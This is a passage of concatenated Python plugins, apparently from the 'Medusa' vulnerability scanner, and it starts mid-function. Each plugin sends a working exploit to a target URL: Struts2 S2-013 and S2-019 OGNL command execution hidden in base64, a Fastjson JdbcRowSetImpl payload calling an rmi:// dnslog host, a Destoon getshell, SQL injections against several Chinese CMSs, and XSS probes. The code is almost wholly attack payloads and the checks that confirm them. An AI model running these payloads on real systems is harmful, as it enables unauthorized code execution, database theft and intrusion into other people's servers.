WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/admin.php?file=tag&action=preview&tag_code={phpinfo()}'
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if con.find("PHP Version") != -1 and con.find(
"System") != -1 and con.find("Build Date") != -1 and con.find(
"Server API") != -1:
Medusa = "{}存在Destoon前台Getshell漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
data = base64.b64decode(
"YT0xJHsoJTIzX21lbWJlckFjY2Vzc1siYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MiXT10cnVlLCUyM2E9QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKCduZXRzdGF0IC1hbicpLmdldElucHV0U3RyZWFtKCksJTIzYj1uZXcramF2YS5pby5JbnB1dFN0cmVhbVJlYWRlciglMjNhKSwlMjNjPW5ldytqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKCUyM2IpLCUyM2Q9bmV3K2NoYXJbNTAwMDBdLCUyM2MucmVhZCglMjNkKSwlMjNzYnRlc3Q9QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpLmdldFdyaXRlcigpLCUyM3NidGVzdC5wcmludGxuKCUyM2QpLCUyM3NidGVzdC5jbG9zZSgpKX0="
)
try:
payload_url = scheme + "://" + url + ":" + str(port) + "/index.action"
headers = {
'User-Agent': RandomAgent,
"Accept":
"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
"Content-Type": "application/x-www-form-urlencoded"
}
resp = requests.post(payload_url,
headers=headers,
data=data,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
resilt = Result(con)
if resilt == "Linux" or resilt == "NoteOS" or resilt == "Windows":
Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-013\r\n返回数据:{}\r\n".format(
url, con, resilt)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm = randoms().result(20)
payload = "/affiche.php?from=a.baidu.com%3Cscript%3Ealert({})%3C/script%3E&ad_id=-1".format(
rm)
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if con.find("<script>alert({})</script>".format(rm)) != -1:
Medusa = "{}存在Ecshop跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/?m=index&a=checkreset'
data = "urldata=YWFhYWFhYWEmdXNlcl9uYW1lPXl1XCZtYWlsYWRyZXM9VU5JT04vKiovU0VMRUNULyoqLzEsMixtZDUoMTIzMzIxKSw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxNSwxNiwxNywxOCwxOSwyMCwyMSwyMiwyMywyNCwyNSwyNiwyNywyOCwyOSwzMCwzMSwzMiwzMywzNCwzNSwzNiwzNywzOCwzOSw0MCw0MSM="
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.post(payload_url,
headers=headers,
data=data,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("c8837b23ff8aaa8a2dde915473ce0991") != -1:
Medusa = "{}存在EasyTalkSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload_url = scheme + '://' + url + ':' + str(port)
DL = Dnslog()
#DL="dsada11111sda.xhqp3u.dnslog.cn"
data = '''{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://%s/Exploit","autoCommit":true}''' % DL.dns_host(
)
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/json',
'Accept-Language':
'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
"Connection": "close",
"Accept-Encoding": "gzip, deflate"
}
resp = requests.post(payload_url,
headers=headers,
data=data,
proxies=proxies,
timeout=10,
verify=False)
if DL.result() and resp.status_code == 400:
Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format(
url, payload_url, resp.text, DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/plus/ajax_user.php"
data = "sunrain%df%27%20or%20%df%271%df%27=%df%271&act=get_pass_check"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.post(payload_url,
data=data,
headers=headers,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("true") != -1:
Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm = randoms().result(20)
payload = "/main/calendar/agenda_list.php?type=personal%27%3E%3Cscript%3Econfirm%28{}%29%3C%2fscript%3E%3C%21--".format(
rm)
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
if con.find("<script>confirm({})</script>".format(rm)) != -1:
Medusa = "{}存在ChamiloLMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/r.php?qlang=cn&qid=&step=1"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
"X-Forwarded-For":
"1.1.1.1",
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
mail = "testvul" + str(random.randint(1000, 9999)) + "@testvul.net"
data = 'administrators_Name=' + mail + '&nickName=testvul&passWord=123456&passWord2=123456&hintPass=3&answerPass=testvul&Action=MemberAddSubmit&submit=%D7%A2%B2%E1&qid='
resp = requests.post(payload_url,
data=data,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
if con.find("administratorsName") != -1 and con.find(
"Bad SQL Query") != -1:
Medusa = "{}存在EnableQSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
data = base64.b64decode(
"ZGVidWc9Y29tbWFuZCZleHByZXNzaW9uPSNmPSNfbWVtYmVyQWNjZXNzLmdldENsYXNzKCkuZ2V0RGVjbGFyZWRGaWVsZCgnYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MnKSwjZi5zZXRBY2Nlc3NpYmxlKHRydWUpLCNmLnNldCgjX21lbWJlckFjY2Vzcyx0cnVlKSwjcmVxPUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVxdWVzdCgpLCNyZXNwPUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVzcG9uc2UoKS5nZXRXcml0ZXIoKSwjYT0obmV3IGphdmEubGFuZy5Qcm9jZXNzQnVpbGRlcihuZXcgamF2YS5sYW5nLlN0cmluZ1tdeyduZXRzdGF0JywnLWFuJ30pKS5zdGFydCgpLCNiPSNhLmdldElucHV0U3RyZWFtKCksI2M9bmV3IGphdmEuaW8uSW5wdXRTdHJlYW1SZWFkZXIoI2IpLCNkPW5ldyBqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKCNjKSwjZT1uZXcgY2hhclsxMDAwMF0sI2QucmVhZCgjZSksI3Jlc3AucHJpbnRsbigjZSksI3Jlc3AuY2xvc2UoKQ=="
)
try:
payload_url = scheme + "://" + url + ":" + str(port) + "/index.action"
headers = {
'User-Agent': RandomAgent,
"Accept":
"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
"Content-Type": "application/x-www-form-urlencoded"
}
resp = requests.post(payload_url,
headers=headers,
data=data,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
resilt = Result(con)
if resilt == "Linux" or resilt == "NoteOS" or resilt == "Windows":
Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-019\r\n返回数据:{}\r\n部署系统:{}\r\n".format(
url, con, resilt)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/flow.php?step=update_cart'
data = "goods_number%5B1%27+and+%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+md5(3.1415)%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+and+1%3D1+%23%5D=1&submit=exp"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
}
resp = requests.post(payload_url,
headers=headers,
data=data,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("63e1f04640e83605c1d177544a5a0488") != -1:
Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/index.php?ctl=ajax&act=load_topic_reply_list"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'application/json',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
}
data = 'topic_id=-1%20union%20select%0b1,2,3,md5(123456),5,6,7,8,9%23'
resp = requests.post(payload_url,
headers=headers,
data=data,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("e10adc3949ba59abbe56e057f20f883e") != -1:
Medusa = "{}存在FanweSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
